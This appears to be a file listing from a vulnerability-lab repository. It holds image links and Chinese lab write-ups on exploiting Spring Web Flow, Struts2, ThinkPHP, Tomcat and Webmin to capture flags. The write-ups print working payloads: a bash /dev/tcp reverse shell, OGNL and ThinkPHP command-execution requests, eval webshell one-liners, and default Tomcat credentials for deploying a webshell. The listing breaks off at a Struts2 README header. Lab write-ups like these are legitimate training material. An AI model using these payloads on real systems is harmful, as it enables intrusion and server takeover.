/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/1.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/1.jpg
--------------------------------------------------------------------------------
/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/2.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/2.jpg
--------------------------------------------------------------------------------
/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/3.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/3.jpg
--------------------------------------------------------------------------------
/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/4.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/4.jpg
--------------------------------------------------------------------------------
/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/5.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/5.jpg
--------------------------------------------------------------------------------
/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/6.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_WebFlow远程代码执行漏洞_xiajibaxie/6.jpg
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/1.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/2.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/3.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/4.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/5.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/6.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/7.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/8.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/9.png
--------------------------------------------------------------------------------
/writeup/Spring_Web_Flow_远程代码执行_CVE-2017-4971/CVE-2017-4971.md:
--------------------------------------------------------------------------------
1 | # Spring Web Flow 远程代码执行(CVE-2017-4971)by [scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 概述
4 |
5 | Spring WebFlow 是一个适用于开发基于流程的应用程序的框架(如购物逻辑),可以将流程的定义和实现流程行为的类和视图分离开来。在其 2.4.x 版本中,如果我们控制了数据绑定时的 field,将导致一个 SpEL 表达式注入漏洞,最终造成任意命令执行。
6 |
7 | ## 漏洞复现
8 |
9 | 1、首先打开靶场。
10 |
11 | 
12 |
13 | 2、输入 login 进入登录页面,然后进行登录,左边有账号密码。
14 |
15 | 
16 |
17 | 3、输入账号密码进行登录。
18 |
19 | 
20 |
21 | 4、访问 /hotels/1 目录,并点击 Book Hotel
22 |
23 | 
24 |
25 | 5、随便输入内容,并点击 Proceed
26 |
27 | 
28 |
29 | 6、点击 Confirm 并进行抓包。
30 |
31 | 
32 |
33 | 7、利用服务器对本地端口进行监听。
34 |
35 | 
36 |
37 | 8、利用 POC 反弹 shell,POC如下。
38 |
39 | `_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/IP/PORT+0>%261")).start()=vulhub`
40 |
41 | 
42 |
43 | 9、反弹成功,查看 Flag.
44 |
45 | 
--------------------------------------------------------------------------------
/writeup/Struts2-devMode/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Struts2-devMode/1.png
--------------------------------------------------------------------------------
/writeup/Struts2-devMode/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Struts2-devMode/2.png
--------------------------------------------------------------------------------
/writeup/Struts2-devMode/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Struts2-devMode/3.png
--------------------------------------------------------------------------------
/writeup/Struts2-devMode/Struts2-devMode.md:
--------------------------------------------------------------------------------
1 | # Struts2-devMode命令执行(CVE-2016-4438) by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 漏洞概述
4 |
5 | 漏洞概述:Apache Struts 2 是世界上最流行的 Java Web 服务器框架之一。Apache Struts2 在使用 REST 插件的情况下,攻击者使用 REST 调用恶意表达式可以远程执行代码。该漏洞编号为 CVE-2016-4438,目前命名为 S2-037。,黑客可以利用漏洞直接执行任意代码,绕过文件限制,上传文件,执行远程命令,控制服务器,直接盗取用户的所有资料,当 Struts2 开启 devMode 模式时,将导致严重远程代码执行漏洞。如果 WebService 启动权限为最高权限时,可远程执行任意命令,包括关机、建立新用户、以及删除服务器上所有文件等等。该漏洞广泛影响所有 struts 版本。
6 |
7 | 受影响的软件及系统:在开启 devMode 情况下,本漏洞可影响 Struts 2.1.0--2.5.1,通杀 Struts2 所有版本
8 |
9 | 启动靶场,随意点击一个测试页面
10 |
11 | 
12 |
13 | 
14 |
15 | 利用 POC 拿到 Flag
16 |
17 | `?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context[%23parameters.rpsobj[0]].getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()))):xx.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=123456789&command=ls`
18 |
19 | 
--------------------------------------------------------------------------------
/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/1.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/2.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/README.md:
--------------------------------------------------------------------------------
1 | # ThinkPHP5远程代码执行漏洞(CNVD-2018-24942)by [hu4wufu](https://github.com/hu4wufu)
2 |
3 | ## 概述
4 |
5 | ThinkPHP5 存在远程代码执行漏洞。该漏洞由于框架对控制器名未能进行足够的检测,攻击者利用该漏洞对目标网站进行远程命令执行攻击。
6 |
7 | ## 影响版本
8 |
9 | 上海顶想信息科技有限公司 ThinkPHP 5.*,<5.1.31
10 |
11 | 上海顶想信息科技有限公司 ThinkPHP <=5.0.23
12 |
13 | ## 漏洞复现
14 |
15 | 1、打开靶场,开启此漏洞对应靶场环境: thinkphp5x 任意代码执行漏洞 (cnvd-2018-24942)
16 |
17 | 2、直接在目录后面增加路径与参数即可
18 |
19 | ```
20 | /index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls /tmp
21 |
22 | ```
23 |
24 | 
25 |
26 |
27 |
--------------------------------------------------------------------------------
/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/【安全通报】宝塔某处未授权访问.pdf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP5远程代码执行漏洞_CNVD-2018-24942_hu4wufu/【安全通报】宝塔某处未授权访问.pdf
--------------------------------------------------------------------------------
/writeup/ThinkPHP_2.X任意代码执行/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP_2.X任意代码执行/1.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP_2.X任意代码执行/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP_2.X任意代码执行/2.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP_2.X任意代码执行/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP_2.X任意代码执行/3.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP_2.X任意代码执行/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP_2.X任意代码执行/4.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP_2.X任意代码执行/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/ThinkPHP_2.X任意代码执行/5.png
--------------------------------------------------------------------------------
/writeup/ThinkPHP_2.X任意代码执行/ThinkPHP2.X任意代码执行.md:
--------------------------------------------------------------------------------
1 | # ThinkPHP 2.X 任意代码执行 by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 漏洞概述
4 |
5 | 在 ThinkPHP ThinkPHP 2.x 版本中,使用 preg_replace 的 /e 模式匹配路由:`$res = preg_replace('@(\w+)'.$depr.'([^'.$depr.'\/]+)@e', '$var[\'\\1\']="\\2";', implode($depr,$paths));`
6 |
7 | 导致用户的输入参数被插入双引号中执行,造成任意代码执行漏洞。
8 |
9 | ThinkPHP 3.0 版本因为 Lite 模式下没有修复该漏洞,也存在这个漏洞。所以先来看看`preg_replace`这个函数,这个函数是个替换函数,而且支持正则,使用方式如下:
10 |
11 | `preg_replace('正则规则','替换字符','目标字符')`
12 |
13 | 这个函数的3个参数,结合起来的意思是:如果目标字符存在符合正则规则的字符,那么就替换为替换字符,如果此时正则规则中使用了`/e`这个修饰符,则存在代码执行漏洞。
14 |
15 | 下面是搜索到的关于`/e`的解释:
16 |
17 | ```
18 | e 配合函数preg_replace()使用, 可以把匹配来的字符串当作正则表达式执行;
19 | /e 可执行模式,此为PHP专有参数,例如preg_replace函数。
20 | ```
21 |
22 | ## Write up
23 |
24 | 首先打开靶场
25 |
26 | 
27 |
28 | 利用 POC 来验证, phpinfo() 成功执行。
29 |
30 | ```
31 | /index.php?s=/index/index/xxx/${@phpinfo()}
32 | ```
33 |
34 | 
35 |
36 | 然后写入一句话
37 |
38 | `/index.php?s=/index/index/xxx/${${@eval($_POST[1])}}`
39 |
40 | 并用菜刀连接
41 |
42 | 
43 |
44 | 连接完成后去 tmp 临时文件下去查看 Flag
45 |
46 | 
47 |
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/1.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/2.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/3.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/4.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/5.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/6.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/7.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Thinkphp5.0.23远程代码执行/8.png
--------------------------------------------------------------------------------
/writeup/Thinkphp5.0.23远程代码执行/Thinkphp5.0.23远程代码执行.md:
--------------------------------------------------------------------------------
1 | # Thinkphp5.0.23 远程代码执行 by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 漏洞概述
4 |
5 | 低于5.0.23版本都存在远程代码执行
6 |
7 | ## write up
8 |
9 | 首先打开靶场
10 |
11 | 
12 |
13 | 利用POC来拿flag
14 |
15 | `_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=ls /tmp`
16 |
17 | 
18 |
19 | 使用phpinfo函数验证来获取敏感信息
20 |
21 | `_method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1`
22 |
23 | 
24 |
25 | 如果要上传 shell ,传 shell 的时候,要 把 eval 替换成 assert 并进行base64转义。对
26 |
27 | `aaabbb` 进行base64转义,
28 |
29 | 转义完成后的POC
30 |
31 | `_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n YWFhPD9waHAgQGFzc2VydCgkX1BPU1RbJ3hzcyddKTs/PmJiYg== | base64 -d > shell1.php
32 | `
33 |
34 | 
35 |
36 | 成功访问,说明上传成功。用菜刀去连接。
37 |
38 | 
39 |
40 | 
41 |
42 | 接上来上大招,一键日站。
43 |
44 | 
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/1.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/2.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/3-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/3-1.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/4.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/5.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/6.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/7.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/8.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Tomcat弱口令/9.png
--------------------------------------------------------------------------------
/writeup/Tomcat弱口令/Tomcat弱口令.md:
--------------------------------------------------------------------------------
1 | # Tomcat 弱口令 Getshell by [Frivolous-scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 漏洞概述
4 |
5 | Apache+Tomcat 是很常用的网站解决方案,Apache 用于提供 web 服务,而 Tomcat 是 Apache 服务器的扩展,用于运行 jsp 页面和 servlet。Tomcat 有一个管理后台,其用户名和密码在 Tomcat 安装目录下的 conf\tomcat-users.xml 文件中配置,不少管理员为了方便,经常采用弱口令。 Tomcat 支持在后台部署 war 包,可以直接将 webshell 部署到 web 目录下,如果 tomcat 后台管理用户存在弱口令,这很容易被利用上传 webshell。
6 |
7 | ## write up
8 |
9 | 首先打开靶场环境。
10 |
11 | 
12 |
13 | 点击登录,弱口令 tomcat:tomcat
14 |
15 | 
16 |
17 | 点击 List Applications
18 |
19 |
20 |
21 | 
22 |
23 | 上传war包。
24 |
25 | 
26 |
27 | 利用命令把 jsp 的冰蝎码转成 war 包
28 |
29 | 
30 |
31 | 上传 war 包。
32 |
33 | 
34 |
35 | 上传成功,部署 war 包之后, war 包会在当前路径下解压。
36 |
37 | 
38 |
39 | 利用冰蝎连接,访问路径是 /war (war包路径) /XXX.jsp(你的 webshell)。
40 |
41 | 
42 |
43 | 查看临时文件来获取 Flag 命令`ls /tmp`
44 |
45 | 
46 |
--------------------------------------------------------------------------------
/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/1.png
--------------------------------------------------------------------------------
/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/2.png
--------------------------------------------------------------------------------
/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/3.png
--------------------------------------------------------------------------------
/writeup/Webmin_远程命令执行漏洞_CVE-2019-15107/CVE-2019-15107.md:
--------------------------------------------------------------------------------
1 | # Webmin 远程命令执行漏洞(CVE-2019-15107)by [scholar](https://github.com/Frivolous-scholar)
2 |
3 | ## 概述
4 |
5 | Webmin 被爆出1.920版本之前存在一个远程命令执行漏洞(CVE-2019-15107),当用户开 Webmin 密码重置功能后,攻击者利用该漏洞可在易受损系统中执行任意命令,进而获取系统 Shell。由于Webmin 中 Password_Change.cgi 在接收请求的处理过程中,old 参数存在命令注入漏洞,可被攻击者恶意利用。
6 |
7 | ## 影响版本
8 |
9 | Webmin 1.920及以下版本。
10 |
11 | ## 漏洞复现
12 |
13 | 1、首先打开靶场。
14 |
15 | 
16 |
17 | 2、利用 POC 进行验证,发现有回显。
18 |
19 | 
20 |
21 | 3、直接查看 Flag。
22 |
23 | 
24 |
25 |
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/1.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/2.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/3.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/4.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/5.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/5.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/6.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/6.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/7.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/7.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/8.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/8.png
--------------------------------------------------------------------------------
/writeup/jboss-CVE-2017-12149/9.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-CVE-2017-12149/9.png
--------------------------------------------------------------------------------
/writeup/jboss-JMXInvokerServlet反序列化/get_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-JMXInvokerServlet反序列化/get_shell.png
--------------------------------------------------------------------------------
/writeup/jboss-JMXInvokerServlet反序列化/put_shell.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-JMXInvokerServlet反序列化/put_shell.png
--------------------------------------------------------------------------------
/writeup/jboss-JMXInvokerServlet反序列化/shell.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/jboss-JMXInvokerServlet反序列化/shell.jpg
--------------------------------------------------------------------------------
/writeup/seacms-v6.45 任意代码执行漏洞/_v_images/20200527192102787_714.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.45 任意代码执行漏洞/_v_images/20200527192102787_714.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.45 任意代码执行漏洞/_v_images/20200527192528773_13488.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.45 任意代码执行漏洞/_v_images/20200527192528773_13488.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.45 任意代码执行漏洞/_v_images/20200527192615646_24839.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.45 任意代码执行漏洞/_v_images/20200527192615646_24839.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527182210256_9173.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527182210256_9173.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527184837945_27168.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527184837945_27168.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527185111991_27068.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527185111991_27068.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527185229499_30175.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527185229499_30175.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527185518860_26945.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527185518860_26945.png
--------------------------------------------------------------------------------
/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527190041412_23974.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/seacms-v6.53 命令执行漏洞/_v_images/20200527190041412_23974.png
--------------------------------------------------------------------------------
/writeup/struts2-045_CVE-2017-5638_hu4wufu/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/fofapro/vulfocus/b79a6d9c47a2b9bcce2dd7fd6ecb8cb585504b04/writeup/struts2-045_CVE-2017-5638_hu4wufu/1.png
--------------------------------------------------------------------------------
/writeup/struts2-045_CVE-2017-5638_hu4wufu/README.md:
--------------------------------------------------------------------------------
1 | # struts2-045(CVE-2017-5638)by [hu4wufu](https://github.com/hu4wufu)
2 |
3 | ## 漏洞描述
4 |
